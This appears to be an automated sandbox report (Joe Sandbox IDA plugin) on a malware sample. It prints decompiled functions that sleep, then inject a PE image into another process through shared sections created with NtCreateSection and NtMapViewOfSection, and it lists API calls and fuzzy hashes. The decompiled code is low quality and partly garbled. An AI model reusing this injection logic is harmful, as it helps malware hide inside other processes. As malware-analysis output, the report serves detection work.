                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t131;
                                                				signed int _t138;
                                                				int _t139;
                                                				void* _t156;
                                                				signed int _t160;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				void* _t165;
                                                				intOrPtr* _t166;
                                                				void* _t169;
                                                				intOrPtr _t179;
                                                				void* _t180;
                                                				void* _t181;
                                                				HANDLE* _t187;
                                                				HANDLE* _t189;
                                                				void* _t194;
                                                				intOrPtr* _t197;
                                                				void* _t200;
                                                				void* _t201;
                                                				intOrPtr* _t203;
                                                				void* _t207;
                                                				long _t222;
                                                
                                                				_pop(ss);
                                                				L00401274(_t85, __edx, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t201 + 8));
                                                				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t201 - 0x5c)) = _t88;
                                                				_t187 = _t201 - 0x60;
                                                				 *_t187 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t187);
                                                				_t91 =  *_t187;
                                                				if(_t91 != 0) {
                                                					_t131 = _t201 - 0x30;
                                                					 *_t131 = _t91;
                                                					_t131[1] = 0;
                                                					_t187 = _t201 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                                                					 *_t187 = 0x18;
                                                					_push(_t201 - 0x30);
                                                					_push(_t187);
                                                					_push(0x40);
                                                					_push(_t201 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t201 - 8)) = 0;
                                                						_t99 = _t201 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t189 = _t201 - 0x54;
                                                						if(NtCreateSection(_t189, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t201 - 0x50);
                                                							_t122 = _t201 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t189, 0xffffffff, _t122, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t201 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t189,  *(_t201 - 0xc), _t124, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                									_t200 =  *(_t201 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t200, 0x104);
                                                									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                                                									 *((intOrPtr*)(_t201 - 8)) =  *((intOrPtr*)(_t201 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t201 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                                                						_t187 = _t201 - 0x58;
                                                						if(NtCreateSection(_t187, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t201 - 8)) != 0) {
                                                							 *_t46 =  *(_t201 - 0x50);
                                                							_t103 = _t201 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t187, 0xffffffff, _t103, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t201 - 0x40;
                                                								 *_t105 = 0;
                                                								_t222 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t105, 0, 0, 0, _t201 - 0x38, 1, 0, 0x20);
                                                								if(_t222 == 0) {
                                                									L16();
                                                									if(_t222 == 0 && _t222 != 0) {
                                                										asm("hlt");
                                                										_push(_t203);
                                                									}
                                                									_push(0x2ea6);
                                                									_t207 = _t203 + 4;
                                                									_t160 = 0x2260;
                                                									_t161 = _t160 << 5;
                                                									_t162 = _t161 + 0x2260;
                                                									asm("lodsb");
                                                									_t163 = _t162;
                                                									asm("loop 0xffffffc4");
                                                									_t164 = _t163 ^ 0xad610a21;
                                                									_t203 = _t207 - _t164;
                                                									_t194 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                                                									_t138 =  *(_t194 + 6) & 0x0000ffff;
                                                									_push(_t194);
                                                									_t165 = _t194;
                                                									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                										_t166 = _t165 + 0xf8;
                                                										__eflags = _t166;
                                                									} else {
                                                										_t166 = _t165 + 0x108;
                                                									}
                                                									_push(_t138);
                                                									_t139 =  *(_t166 + 0x10);
                                                									if(_t139 != 0) {
                                                										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t139);
                                                										_t203 = _t203 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t187);
                                                									_t226 =  *((intOrPtr*)(_t201 - 0x34));
                                                									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                										_push(_t187);
                                                										_t169 = _t187[0xd] -  *(_t201 - 0x40);
                                                										_t197 = _t187[0x28] +  *(_t201 - 0x48);
                                                										__eflags = _t197;
                                                										while(1) {
                                                											__eflags =  *_t197;
                                                											if( *_t197 == 0) {
                                                												break;
                                                											}
                                                											_t179 =  *_t197;
                                                											_t197 = _t197 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t169;
                                                												__eflags =  *((intOrPtr*)( *(_t201 - 0x48) + 0 + _t179));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t187);
                                                										__eflags = 0;
                                                										_t109 = _t201 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0, _t187[0xa] +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t109, 0);
                                                									} else {
                                                										L49();
                                                										_pop(_t180);
                                                										_t181 = _t180 - 0x1892;
                                                										 *((intOrPtr*)(_t181 + 0x18c6)) = _t181 + 0x304c;
                                                										L004012E3(_t128, _t226);
                                                										0x33(_t181 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t181 + 0x18eb)) = _t181 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t203;
                                                				_push(0x392);
                                                				_t156 = 0xf1;
                                                				return L00401274(_t92, _t156, _t187, _t226);
                                                			}







































                                                0x00401617
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 25f5eb01983d9281b1127e50c890fc92aa8b6165b5d631ffe35390f1c87f28db
                                                • Instruction ID: 57dcf3cccefe6a0511f6925536cc6eed8aa77802ca08ef68a5075aa0b4e04b8e
                                                • Opcode Fuzzy Hash: 25f5eb01983d9281b1127e50c890fc92aa8b6165b5d631ffe35390f1c87f28db
                                                • Instruction Fuzzy Hash: 2851E8B5900249BBEF209F95CC48FEBBFB8EF85B10F100159FA11BA2A5D6709944CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 436 4019b6-4019d9 440 4019e1-401a20 call 401274 Sleep call 4014db 436->440 441 4019ea 436->441 450 401a22-401a2a call 4015d5 440->450 451 401a2f-401a81 call 401274 440->451 441->440 450->451
                                                C-Code - Quality: 24%
                                                			E004019B6(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v3;
                                                				intOrPtr _v8;
                                                				intOrPtr* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				char* __ebp;
                                                
                                                				_push(0x1a03);
                                                				asm("les eax, [ebx+ebp*8]");
                                                				 *__eax =  *__eax + __al;
                                                				__edx = 0x3a;
                                                				__eax = L00401274(__eax, __edx, __esi, __eflags);
                                                				__ebx = _a4;
                                                				Sleep(0x1388);
                                                				_push(__ebx);
                                                				asm("sbb al, 0x8d");
                                                				__ebp =  &_v3;
                                                				asm("cld");
                                                				_push(__eax);
                                                				_push(_a12);
                                                				_push(_a8);
                                                				_push(__ebx); // executed
                                                				__eax = L004014DB(__ebx, __edi, __esi); // executed
                                                				__eflags = __eax;
                                                				if(__eflags != 0) {
                                                					__eax = E004015D5(__eflags, __ebx, __eax, _v8, _a16); // executed
                                                				}
                                                				__eax =  *__ebx(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				__eax =  *__esp;
                                                				__esp = __esp + 4;
                                                				_push(0x7a);
                                                				__esp = __esp + 4;
                                                				__edx = 0x3a;
                                                				return __eax;
                                                			}









                                                0x004019c7
                                                0x004019d0
                                                0x004019e4
                                                0x004019f6
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a44
                                                0x00401a55
                                                0x00401a5a
                                                0x00401a6c
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                  • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 343382a63b9dc1a00de7b251b98f39ef397375da7f983e3c6d6c25cfe0f74acf
                                                • Instruction ID: eb9b8508e323ec0cad1531328720b9b31e587639ee963e529393297323997007
                                                • Opcode Fuzzy Hash: 343382a63b9dc1a00de7b251b98f39ef397375da7f983e3c6d6c25cfe0f74acf
                                                • Instruction Fuzzy Hash: 5E11ACB170D204FBDB00AA958C92EAA3668AB41350F208137F643790F0D57D9A13EB6F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 465 4019c1-4019d8 467 4019e1-401a20 call 401274 Sleep call 4014db 465->467 468 4019ea 465->468 477 401a22-401a2a call 4015d5 467->477 478 401a2f-401a81 call 401274 467->478 468->467 477->478
                                                C-Code - Quality: 37%
                                                			E004019C1(intOrPtr* __eax, void* __ebx, void* __edi, signed int __esi, void* __eflags) {
                                                				void* _t11;
                                                				void* _t12;
                                                				signed char _t14;
                                                				signed char _t17;
                                                				intOrPtr* _t19;
                                                				intOrPtr* _t21;
                                                				void* _t26;
                                                				void* _t27;
                                                				void* _t31;
                                                				void* _t32;
                                                				signed char* _t34;
                                                				intOrPtr* _t40;
                                                
                                                				_t29 = __esi;
                                                				_t27 = __edi;
                                                				_t11 = __ebx;
                                                				_t21 = __eax;
                                                				if(__eflags >= 0) {
                                                					 *(__ebx + 0x1a0368) =  *(__ebx + 0x1a0368) ^ __esi;
                                                					_push(0x1a03);
                                                					_t17 =  *_t34;
                                                					asm("les eax, [ebx+ebp*8]");
                                                					_t19 = (_t17 & 0x00000083) + 0xefebec34;
                                                					_t40 = _t19;
                                                					 *_t19 =  *_t19 + _t19;
                                                					_t26 = 0x3a;
                                                					_t11 = L00401274(_t19, _t26, __esi, _t40);
                                                					_t21 =  *((intOrPtr*)(_t31 + 8));
                                                					Sleep(0x1388);
                                                				}
                                                				_push(_t21);
                                                				asm("sbb al, 0x8d");
                                                				_t32 = _t31 + 1;
                                                				asm("cld");
                                                				_push(_t11);
                                                				_push( *((intOrPtr*)(_t32 + 0x10)));
                                                				_push( *((intOrPtr*)(_t32 + 0xc)));
                                                				_push(_t21); // executed
                                                				_t12 = L004014DB(_t21, _t27, _t29); // executed
                                                				_t41 = _t12;
                                                				if(_t12 != 0) {
                                                					E004015D5(_t41, _t21, _t12,  *((intOrPtr*)(_t32 - 4)),  *((intOrPtr*)(_t32 + 0x14))); // executed
                                                				}
                                                				 *_t21(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				_t14 =  *_t34;
                                                				_push(0x7a);
                                                				return L00401274(_t14, 0x3a, _t29, _t41);
                                                			}















                                                0x004019c1
                                                0x004019c1
                                                0x004019c1
                                                0x004019c1
                                                0x004019c2
                                                0x004019c4
                                                0x004019c7
                                                0x004019cc
                                                0x004019d0
                                                0x004019d3
                                                0x004019d3
                                                0x004019e4
                                                0x004019f6
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a55
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 10279e3da5121546f0d91c1218fcc9a868dda0bee5ac91498bd985457264a302
                                                • Instruction ID: bc127a57cd23688ba61662e4244e13cd0ea45db4b64a25b4eed15f00afb0d5a5
                                                • Opcode Fuzzy Hash: 10279e3da5121546f0d91c1218fcc9a868dda0bee5ac91498bd985457264a302
                                                • Instruction Fuzzy Hash: 95118E7170D240EBDB019AA4CD92EAA3764AB45350F2081BBF547790F1C67D9613EF1B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 492 401a39 493 401a3c-401a81 call 401274 492->493 494 4019ce-401a20 call 401274 Sleep call 4014db 492->494 514 401a22-401a2a call 4015d5 494->514 515 401a2f-401a4b 494->515 514->515 515->493
                                                C-Code - Quality: 31%
                                                			E00401A39(signed int __eax, void* __edi, void* __esi) {
                                                				intOrPtr* _t9;
                                                				void* _t10;
                                                				void* _t11;
                                                				intOrPtr _t13;
                                                				intOrPtr* _t16;
                                                				void* _t20;
                                                				void* _t26;
                                                				void* _t27;
                                                				intOrPtr* _t29;
                                                				intOrPtr* _t33;
                                                
                                                				_t24 = __esi;
                                                				asm("les eax, [ebx+ebp*8]");
                                                				_t9 = (__eax & 0x00000083) + 0xefebec34;
                                                				_t33 = _t9;
                                                				 *_t9 =  *_t9 + _t9;
                                                				_t20 = 0x3a;
                                                				_t10 = L00401274(_t9, _t20, __esi, _t33);
                                                				_t16 =  *((intOrPtr*)(_t26 + 8));
                                                				Sleep(0x1388);
                                                				_push(_t16);
                                                				asm("sbb al, 0x8d");
                                                				_t27 = _t26 + 1;
                                                				asm("cld");
                                                				_push(_t10);
                                                				_push( *((intOrPtr*)(_t27 + 0x10)));
                                                				_push( *((intOrPtr*)(_t27 + 0xc)));
                                                				_push(_t16); // executed
                                                				_t11 = L004014DB(_t16, __edi, _t24); // executed
                                                				_t34 = _t11;
                                                				if(_t11 != 0) {
                                                					E004015D5(_t34, _t16, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
                                                				}
                                                				 *_t16(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				_t13 =  *_t29;
                                                				_push(0x7a);
                                                				return L00401274(_t13, 0x3a, _t24, _t34);
                                                			}













                                                0x00401a39
                                                0x004019d0
                                                0x004019d3
                                                0x004019d3
                                                0x004019e4
                                                0x004019f6
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a55
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                  • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 328c7e616dc65b60337e749517f620b74e3a6904ffc48dfa277e7a67c85ebbd0
                                                • Instruction ID: 3e21701bb5f0e512797832e813f874bbfc20ecba1c70a9a875b4590e50435436
                                                • Opcode Fuzzy Hash: 328c7e616dc65b60337e749517f620b74e3a6904ffc48dfa277e7a67c85ebbd0
                                                • Instruction Fuzzy Hash: 1F016971709104EBDB00AA94CD92AAA3264AB45350F20817BF643B90F0D63D9A13EB1F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 519 4019e8-401a20 call 401274 Sleep call 4014db 525 401a22-401a2a call 4015d5 519->525 526 401a2f-401a81 call 401274 519->526 525->526
                                                C-Code - Quality: 31%
                                                			E004019E8(intOrPtr* __eax, void* __edi, void* __esi, void* __eflags) {
                                                				void* _t8;
                                                				void* _t9;
                                                				intOrPtr _t11;
                                                				intOrPtr* _t14;
                                                				void* _t18;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				intOrPtr* _t28;
                                                
                                                				_t22 = __esi;
                                                				_t7 = __eax;
                                                				_t25 = _t24 - 1;
                                                				asm("invalid");
                                                				 *__eax =  *__eax + __eax;
                                                				_t18 = 0x3a;
                                                				_t8 = L00401274(_t7, _t18, __esi, __eflags);
                                                				_t14 =  *((intOrPtr*)(_t25 + 8));
                                                				Sleep(0x1388);
                                                				_push(_t14);
                                                				asm("sbb al, 0x8d");
                                                				_t26 = _t25 + 1;
                                                				asm("cld");
                                                				_push(_t8);
                                                				_push( *((intOrPtr*)(_t26 + 0x10)));
                                                				_push( *((intOrPtr*)(_t26 + 0xc)));
                                                				_push(_t14); // executed
                                                				_t9 = L004014DB(_t14, __edi, _t22); // executed
                                                				_t33 = _t9;
                                                				if(_t9 != 0) {
                                                					E004015D5(_t33, _t14, _t9,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
                                                				}
                                                				 *_t14(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				_t11 =  *_t28;
                                                				_push(0x7a);
                                                				return L00401274(_t11, 0x3a, _t22, _t33);
                                                			}












                                                0x004019e8
                                                0x004019e8
                                                0x004019e8
                                                0x004019e9
                                                0x004019e4
                                                0x004019f6
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a55
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                  • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 48fa2cf4c2f539a98f446827c3e80ab619ac2f5f9041cc3ed543c0119245ada8
                                                • Instruction ID: 7b7b6cc2fe2900c275b7dd1747d7b1898519f5b928d3d531ab9a34503a4fca0f
                                                • Opcode Fuzzy Hash: 48fa2cf4c2f539a98f446827c3e80ab619ac2f5f9041cc3ed543c0119245ada8
                                                • Instruction Fuzzy Hash: BE018432709244EBDF00AA949C41EAA3764EB46350F20857BF603790F1D53D9712EF1B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 540 4019fd-401a20 call 401274 Sleep call 4014db 546 401a22-401a2a call 4015d5 540->546 547 401a2f-401a81 call 401274 540->547 546->547
                                                C-Code - Quality: 28%
                                                			E004019FD(void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				void* _t7;
                                                				void* _t8;
                                                				void* _t9;
                                                				void* _t10;
                                                				intOrPtr _t12;
                                                				intOrPtr* _t15;
                                                				void* _t24;
                                                				void* _t25;
                                                				intOrPtr* _t27;
                                                
                                                				_t22 = __esi;
                                                				_t8 = _t7;
                                                				_t9 = L00401274(_t8, __edx, __esi, __eflags);
                                                				_t15 =  *((intOrPtr*)(_t24 + 8));
                                                				Sleep(0x1388);
                                                				_push(_t15);
                                                				asm("sbb al, 0x8d");
                                                				_t25 = _t24 + 1;
                                                				asm("cld");
                                                				_push(_t9);
                                                				_push( *((intOrPtr*)(_t25 + 0x10)));
                                                				_push( *((intOrPtr*)(_t25 + 0xc)));
                                                				_push(_t15); // executed
                                                				_t10 = L004014DB(_t15, __edi, _t22); // executed
                                                				_t32 = _t10;
                                                				if(_t10 != 0) {
                                                					E004015D5(_t32, _t15, _t10,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                                                				}
                                                				 *_t15(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				_t12 =  *_t27;
                                                				_push(0x7a);
                                                				return L00401274(_t12, 0x3a, _t22, _t32);
                                                			}












                                                0x004019fd
                                                0x004019fd
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a55
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                  • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 03d31081f505732ec7608c318e1bec12685054c6a59865ceb143d80203a04e86
                                                • Instruction ID: 733ad67ec3470f7c6e230ccf9a96fa2733df2227e0d514dfe6a1d91c756ccb5a
                                                • Opcode Fuzzy Hash: 03d31081f505732ec7608c318e1bec12685054c6a59865ceb143d80203a04e86
                                                • Instruction Fuzzy Hash: A1F03C3570A204EBDF00AA959C41EAA3624AB45354F208577B603B91F1D67D9A12AF2B
